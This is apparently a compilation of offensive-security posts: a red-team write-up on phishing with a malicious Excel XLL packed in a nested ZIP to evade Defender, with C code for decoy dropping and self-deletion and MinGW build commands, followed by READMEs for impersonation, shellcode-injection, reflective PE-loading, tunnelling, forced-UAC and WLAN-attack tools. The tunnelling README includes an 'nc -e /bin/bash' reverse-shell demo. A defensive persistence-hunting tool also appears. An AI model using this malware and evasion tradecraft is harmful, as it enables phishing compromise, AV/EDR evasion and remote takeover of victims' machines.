The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.

A notable deviation from his repository: should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions in the previously linked repo using that version, as opposed to the 2010 version of the SDK mentioned in the README.

Delivery

Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:

  1. Email Attachment
  2. Web Delivery

Email Attachment

Whether via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:

  1. Block executable attachments (EXE, DLL, XLL, MZ headers overall)
  2. Block containers like ISO/IMG which are mountable and may contain executable content
  3. Examine zip files and block those containing executable content
  4. Block zip files that are password protected
  5. More

Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.

For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.

Web Delivery

Email will still be used in this attack vector; however, rather than sending an attachment, it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced for email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.

The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files, for example, cannot be opened by Windows without installing third-party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.

The organization unfortunately blocks ISOs and IMGs from being downloaded from the web; additionally, because it employs Data Loss Prevention (DLP), users are unable to mount external storage devices, which ISOs and IMGs are considered to be.

Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, including prompting the user for the password of password-protected zips; however, because the executable is zipped, it is not blocked by the otherwise blanket deny for MZ files.

Zip files and execution

Zip files were chosen as a container for our XLL payload because:

  1. They are natively compatible with Windows
  2. They are allowed to be downloaded from the internet by the organization
  3. They add very little additional complexity to the attack

Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:

 

Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender, even when using the stock project from edparcell, which doesn't contain any malicious code.

 

Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:


However, there is something odd: the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in Process Explorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:

 

This appears to be a wrinkle associated with ZIP files, not XLLs. Opening a TXT file from within a zip using Notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.

If a user were to extract the XLL from the ZIP file and then run it, it would execute without any issue; however, there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler, and a victim is far more likely to complete those simple actions than to go to the trouble of extracting the ZIP.

This problem caused me to begin considering a different payload type than XLL; I began exploring VSTOs (Visual Studio Tools for Office). I highly encourage you to check out that article.

VSTOs ultimately call a DLL, which can either be located locally alongside the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via HTTP/HTTPS. The local option provides no real advantages (and in fact several disadvantages, in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, we find that VSTOs do not mitigate any of the issues our XLL payload is running into in this scenario.

We really seem to be backed into a corner here. Running the XLL itself is fine; however, the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container; however, due to DLP, formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third-party software, which really leaves ZIP as the option; however, as discussed, running the XLL from a zipped folder results in it being copied and run from appdata\local\temp, which flags AV.

I spent many hours brainstorming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work.

This time I created a folder, placed the XLL inside it, and then zipped the folder:

 

Clicking into the folder reveals the XLL file:


Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp; however, there is an additional layer due to the extra folder that we created:

 

Clicking enable executes our code without flagging Defender:


Nice! Code execution. Now what?

Tradecraft

The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow-through, victims may become suspicious and report the document to their security teams, which can quickly give the attacker away and curtail access to the target system.

The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.

We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.
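
A minimal C sketch of that drop-and-open step might look like the following (hedged: xlsx_bytes, the decoy handling, and the module-handle plumbing are illustrative, not the exact code released below):

#include <windows.h>
#include <shellapi.h>
#include <stdio.h>
#include <wchar.h>

/* Illustrative placeholder; the real array holds the embedded XLSX bytes. */
static unsigned char xlsx_bytes[] = { 0x50, 0x4B /* , ... */ };

/* 'self' is the XLL's module handle, e.g. saved from DllMain. */
void drop_and_open_decoy(HMODULE self)
{
    wchar_t path[MAX_PATH];
    if (!GetModuleFileNameW(self, path, MAX_PATH)) return;

    /* Same base name, different extension: importantdoc.xll -> importantdoc.xlsx */
    wchar_t *dot = wcsrchr(path, L'.');
    if (!dot) return;
    wcscpy(dot, L".xlsx");

    FILE *f = _wfopen(path, L"wb");
    if (!f) return;
    fwrite(xlsx_bytes, 1, sizeof(xlsx_bytes), f);
    fclose(f);

    /* Hand the decoy to the default handler (Excel). */
    ShellExecuteW(NULL, L"open", path, NULL, NULL, SW_SHOWNORMAL);
}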

Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely self-deletion. Combining these two techniques results in the XLL being deleted from disk and the XLSX of the same name being dropped in its place. To the undiscerning eye, it will appear that the XLSX was there the entire time.
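
For reference, the self-deletion primitive itself (the rename-to-ADS-then-dispose trick popularized by LloydLabs' delete-self-poc) can be sketched roughly like this; the stream name and buffer size are illustrative:

#include <windows.h>
#include <string.h>
#include <wchar.h>

BOOL self_delete(void)
{
    /* NULL yields the host EXE path; an XLL would pass its own module handle. */
    wchar_t path[MAX_PATH];
    if (!GetModuleFileNameW(NULL, path, MAX_PATH)) return FALSE;

    /* 1) Rename the primary data stream to an alternate data stream. */
    HANDLE h = CreateFileW(path, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL,
                           OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return FALSE;

    const wchar_t *ads = L":trash";
    char buf[sizeof(FILE_RENAME_INFO) + 64] = { 0 };
    FILE_RENAME_INFO *ri = (FILE_RENAME_INFO *)buf;
    ri->FileNameLength = (DWORD)(wcslen(ads) * sizeof(wchar_t));
    memcpy(ri->FileName, ads, ri->FileNameLength);
    BOOL ok = SetFileInformationByHandle(h, FileRenameInfo, ri, sizeof(buf));
    CloseHandle(h);
    if (!ok) return FALSE;

    /* 2) Reopen and mark the file for deletion when the handle closes. */
    h = CreateFileW(path, DELETE | SYNCHRONIZE, FILE_SHARE_READ, NULL,
                    OPEN_EXISTING, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) return FALSE;
    FILE_DISPOSITION_INFO di = { TRUE };
    ok = SetFileInformationByHandle(h, FileDispositionInfo, &di, sizeof(di));
    CloseHandle(h);
    return ok;
}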

Unfortunately, the location where the XLL is deleted and the XLSX dropped is the appdata\local\temp folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution, in addition to the aforementioned actions, the XLL could try to locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP, containing just the XLSX, in its place. This could of course fail if the user saved the original ZIP in a different location or under a different name; however, in most cases it should land in the user's Downloads folder automatically.


This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.

Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.

This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so I am not quite sure why that differs.


Detection

As always, we will ask "What does MDE see?"

A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:



 

First off, zero alerts:


What does the timeline/event log capture?


Yikes. Truth be told, I have no idea where the keylogging, credential-encrypting, and credential-decrypting alerts are coming from, as my code does none of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone the hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably OK.

Code Sample

The moment most have probably been waiting for: I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always: do no harm, have permission to phish an organization, etc.

Compiling and setup

I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the XLSX you wish to present to the user, as well as on the ZIP file containing the folder which contains that same XLSX, and store them in their respective byte arrays. Compile this code using:

gcc -o ingestfile ingestfile.c
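
The full ingestfile.c ships with the project; the core of such a tool is only a few lines, roughly like this sketch (read the file byte by byte and print hex ready to paste into an array):

#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 1; }

    int c, i = 0;
    while ((c = fgetc(f)) != EOF)
        printf("0x%02x,%s", c, (++i % 12) ? " " : "\n"); /* paste into a byte array */
    printf("\n");
    fclose(f);
    return 0;
}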

I had some issues getting my XLLs to compile using MinGW on a Kali machine, so I thought I would post the commands here:

x64

x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/

x86

i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 

After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:

zip -r <myzipname>.zip <foldername>/

Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.

Conclusion

With the dominance of Office macros coming to a close, XLLs present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!



SharpImpersonation - A User Impersonation Tool - Via Token Or Shellcode Injection


This was a learning-by-doing project on my side. Well-known techniques are used to build just another impersonation tool, with some improvements in comparison to other public tools. The code base was taken from:

A blog post for the introduction can be found here:


List user processes

PS C:\temp> SharpImpersonation.exe list


List only elevated processes

PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>


Inject base64 encoded shellcode into the first process of the target user

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>


Inject shellcode loaded from a webserver into the first process of the target user

PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>


Impersonate the target user via ImpersonateLoggedOnUser for the current session

PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
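
For context, the core Win32 primitive behind the token technique can be sketched in a few lines of C (SharpImpersonation itself is C#; process selection, privileges, and error handling are omitted here):

#include <windows.h>

/* Duplicate the target process token and impersonate it on the current thread. */
BOOL impersonate_pid(DWORD pid)
{
    HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (!hProc) return FALSE;

    HANDLE hTok = NULL, hDup = NULL;
    BOOL ok = FALSE;
    if (OpenProcessToken(hProc, TOKEN_DUPLICATE | TOKEN_QUERY, &hTok) &&
        DuplicateTokenEx(hTok, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation,
                         TokenImpersonation, &hDup))
        ok = ImpersonateLoggedOnUser(hDup); /* call RevertToSelf() when done */

    if (hDup) CloseHandle(hDup);
    if (hTok) CloseHandle(hTok);
    CloseHandle(hProc);
    return ok;
}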


SDomDiscover - A Easy-To-Use Python Tool To Perform DNS Recon




An easy-to-use Python tool to perform DNS recon with multiple options

Installation:

It can be installed on any OS with Python 3.

Manual installation

git clone https://github.com/D3Ext/SDomDiscover
cd SDomDiscover
pip3 install -r requirements.txt

One-liner

git clone https://github.com/D3Ext/SDomDiscover && cd SDomDiscover && pip3 install -r requirements.txt && python3 SDomDiscover.py

Usage:

Common usages

To see the help panel and other parameters

python3 SDomDiscover.py -h

Main usage of the tool to dump the valid domains in the SSL certificate

python3 SDomDiscover.py -d example.com

Used to perform all the queries and reconnaissance

python3 SDomDiscover.py -d domain.com --all


Pinecone - A WLAN Red Team Framework


Pinecone is a WLAN networks auditing tool, suitable for red team usage. It is extensible via modules, and it is designed to be run in Debian-based operating systems. Pinecone is specially oriented to be used with a Raspberry Pi, as a portable wireless auditing box.

This tool is designed for educational and research purposes only. Only use it with explicit permission.


Installation

For running Pinecone, you need a Debian-based operating system (it has been tested on Raspbian, Raspberry Pi Desktop and Kali Linux). Pinecone has the following requirements:

  • Python 3.5+. Your distribution probably comes with Python 3 already installed; if not, it can be installed using apt-get install python3.
  • dnsmasq (tested with version 2.76). Can be installed using apt-get install dnsmasq.
  • hostapd-wpe (tested with version 2.6). Can be installed using apt-get install hostapd-wpe. If your distribution repository does not have a hostapd-wpe package, you can either try to install it using a Kali Linux repository pre-compiled package, or compile it from its source code.

After installing the necessary packages, you can install the Python packages requirements for Pinecone using pip3 install -r requirements.txt in the project root folder.

Usage

For starting Pinecone, execute python3 pinecone.py from within the project root folder:

root@kali:~/pinecone# python3 pinecone.py 
[i] Database file: ~/pinecone/db/database.sqlite
pinecone >

Pinecone is controlled via a Metasploit-like command-line interface. You can type help to get the list of available commands, or help 'command' to get more information about a specific command:

pinecone > help

Documented commands (type help <topic>):
========================================
alias help load pyscript set shortcuts use
edit history py quit shell unalias

Undocumented commands:
======================
back run stop

pinecone > help use
Usage: use module [-h]

Interact with the specified module.

positional arguments:
module module ID

optional arguments:
-h, --help show this help message and exit

Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options that can be seen by typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in the background (for example, scripts/infrastructure/ap), you can stop it using the stop command while the module is running.

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines


PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery.


The Why

Why write such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command-line equivalent, I did not find it a good fit for me. Plus, some of the techniques I have implemented so far in PersistenceSniper have not been implemented in Autoruns yet, as far as I know. Anyway, if what you need is an easy-to-use, GUI-based tool with lots of already-implemented features, Autoruns is the way to go; otherwise, let PersistenceSniper have a shot, it won't miss it :)

Usage

Using PersistenceSniper is as simple as:

PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence

If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:

Get-Help -Name Find-AllPersistence -Full

PersistenceSniper's Find-AllPersistence returns an array of objects of type PSCustomObject with the following properties:

This allows for easy output formatting and filtering. Let's say you only want to see the persistences that will allow the attacker to regain access as NT AUTHORITY\SYSTEM (aka System):
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"


Of course, PersistenceSniper being a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView in order to have a GUI-based table to interact with.


Interpreting results

As already introduced, Find-AllPersistence outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:

  • ComputerName: this is fairly straightforward. If you run Find-AllPersistence without a -ComputerName parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;
  • Technique: this is the name of the technique itself, as it's commonly known in the community;
  • Classification: this property can be used to quickly identify techniques based on their MITRE ATT&CK technique and subtechnique number. For those techniques which don't have a MITRE ATT&CK classification, other classifications are used, the most common being Hexacorn's one since a lot of techniques were discovered by him. When a technique's source cannot be reliably identified, the "Uncatalogued Technique N.#" classification is used;
  • Path: this is the path, on the filesystem or in the registry, at which the technique has been implanted;
  • Value: this is the value of the registry property the techniques uses, or the name of the executable/library used, in case it's a technique which relies on planting something on the filesystem;
  • Access Gained: this is the kind of access the technique grants the attacker. If it's a Run key under HKCU for example, the access gained will be at a user level, while if it's under HKLM it will be at system level;
  • Note: this is a quick explanation of the technique, so that its workings can be easily grasped;
  • Reference: this is a link to a more in-depth explanation of the technique, should the analyst need to study it more.

Dealing with false positives

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legitimately used, many indeed are used by legit software which needs to autorun on system boot or user login.

This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:

  • Not having to manage a whitelist of persistences which can be tedious and error-prone;
  • Tailoring the false positives to the organizations, and their organizational units, which use the tool;
  • Making it harder for attackers who want to blend in false positives by not publicly disclosing them in the tool's code.

Find-AllPersistence comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.

PS C:\> Find-AllPersistence -DiffCSV false_positives.csv

 

Looking for persistences by taking incremental snapshots

One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.

Persistence techniques implemented so far

The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:

Credits

The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:

I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.

License

This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.



Nim-RunPE - A Nim Implementation Of Reflective PE-Loading From Memory


A Nim implementation of reflective PE-Loading from memory. The base for this code was taken from RunPE-In-Memory - which I ported to Nim.

You'll need to install the following dependencies:

nimble install ptr_math winim

I tested this with Nim version 1.6.2 only, so use that version for testing; I cannot guarantee error-free behavior on other versions.


Compile

If you want to pass arguments on runtime or don't want to pass arguments at all compile via:

nim c NimRunPE.nim

If you want to hardcode custom arguments modify const exeArgs to your needs and compile with:

nim c -d:args NimRunPE.nim - this was contributed by @glynx, thanks!

😎

More Information

The technique itself is pretty old, but I didn't find a Nim implementation yet. So this has changed now. :)



If you plan to load e.g. Mimikatz with this technique, make sure to compile a version from source on your own, as the release binaries don't accept arguments after being loaded reflectively by this loader. Why? I really don't know; it's strange, but a fact. If you compile on your own it will still work:


 

My private Packer is also weaponized with this technique - but all Win32 functions are replaced with Syscalls there. That makes the technique stealthier.



GraphCrawler - GraphQL Automated Security Testing Toolkit


Graph Crawler is the most powerful automated testing toolkit for any GraphQL endpoint.

NEW: Can search for endpoints for you using Escape Technology's powerful Graphinder tool. Just point it towards a domain and add the '-e' option and Graphinder will do subdomain enumeration + search popular directories for GraphQL endpoints. After all this GraphCrawler will take over and work through each find.

It will run through and check if mutation is enabled, check for any sensitive queries available, such as users and files, and it will also test any easy queries it finds to see if authentication is required.

If introspection is not enabled on the endpoint, it will check if it is an Apollo Server and can then run Clairvoyance to brute force and grab the suggestions to try to build the schema itself (see the Clairvoyance project for greater details). It will then score the findings 1-10, with 10 being the most critical.

If you want to dig deeper into the schema you can also use graphql-path-enum to look for paths to certain types, like user IDs, emails, etc.

I hope this saves you as much time as it has saved me.


Usage

python graphCrawler.py -u https://test.com/graphql/api -o <fileName> -a "<headers>"



The output option is not required; by default it will output to schema.json.

Example output:

Requirements

  • Python3
  • Docker
  • Install all Python dependencies with pip

Wordlist from google-10000-english

TODO

  • Add option for "full report" following the endpoint search where it will run clairvoyance and all other aspects of the toolkit on the endpoints found
  • Default to "simple scan" to just find endpoints when this feature is added
  • Way future: help craft queries based off the schema provided


Gohide - Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption


Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

  • Session Cookie HTTP GET (http-client)
  • Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
  • WebSocket Handshake "Sec-WebSocket-Key" (websocket-client)
  • WebSocket Handshake "Sec-WebSocket-Accept" (websocket-server)
  • No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.
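
To illustrate the idea (a hedged C sketch, not Gohide's actual Go internals): once the AES-GCM output is base64-encoded, the http-client mode boils down to wrapping it in an otherwise ordinary-looking request:

#include <stdio.h>

/* Build an http-client style request whose session cookie carries ciphertext. */
int build_request(char *out, size_t cap, const char *b64_ciphertext)
{
    return snprintf(out, cap,
        "GET /news/api/latest HTTP/1.1\r\n"
        "Host: cdn-tbn0.gstatic.com\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\n"
        "Cookie: Session=%s; Secure; HttpOnly\r\n"
        "\r\n",
        b64_ciphertext);
}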


Usage

root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")

Scenario

Box A - Reverse Handler.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081

Box B - Target.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091

Note: /etc/hosts "127.0.0.1 target.com"

Box B - Netcat /bin/bash

root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A - Netcat client

root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide

Obfuscation Samples

websocket-client (Box A to Box B)

  • Sec-WebSocket-Key contains AES-GCM encrypted content e.g. "uname -a".
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13

websocket-server (Box B to Box A)

  • Sec-WebSocket-Accept contains AES-GCM encrypted output.
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

http-client

  • Session cookie header contains AES-GCM encrypted content
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

http-server

  • Set-Cookie header contains AES-GCM encrypted content.
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

none

8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA

 


 

Future

  • Fix up error handling.

Enjoy~



ForceAdmin - Create Infinite UAC Prompts Forcing A User To Run As Admin


ForceAdmin is a C# payload builder that creates infinite UAC pop-ups until the user allows the program to be run. The inputted commands are run via PowerShell calling cmd.exe and should use batch syntax. Why use it? Well, some users have UAC set to always show, so UAC bypass techniques are not possible; however, this attack will force them to run as admin, bypassing these settings.
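
The underlying loop is straightforward; here is a hedged C sketch of the concept (ForceAdmin itself is C#, and nag_until_elevated is an illustrative name): keep re-requesting the runas verb until the user stops clicking No.

#include <windows.h>
#include <shellapi.h>

void nag_until_elevated(const wchar_t *payload)
{
    SHELLEXECUTEINFOW sei = { sizeof(sei) };
    sei.lpVerb = L"runas";   /* triggers the UAC prompt */
    sei.lpFile = payload;
    sei.nShow  = SW_SHOW;

    /* Declining UAC makes ShellExecuteExW fail with ERROR_CANCELLED; ask again. */
    while (!ShellExecuteExW(&sei))
        if (GetLastError() != ERROR_CANCELLED) break;
}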


Screenshots


Required

For building on your own, the following NuGet packages are needed

  • Fody: "Extensible tool for weaving .net assemblies."
  • Costura.Fody "Fody add-in for embedding references as resources."
  • Microsoft.AspNet.WebApi.Client "This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."

Installation

You can download the latest tarball by clicking here or latest zipball by clicking here.

Download the project:

$ git clone https://github.com/catzsec/ForceAdmin.git

Enter the project folder

$ cd ForceAdmin

Run ForceAdmin:

$ dotnet run

Compile ForceAdmin:

$ dotnet publish -r win-x64 -c Release -o ./publish/

⚠ONLY USE FOR EDUCATIONAL PURPOSES⚠

Any questions, errors or solutions, create an Issue in the Issues tab.



Coercer - A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine Through 9 Methods


A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods.

Features

  • Automatically detects open SMB pipes on the remote machine.
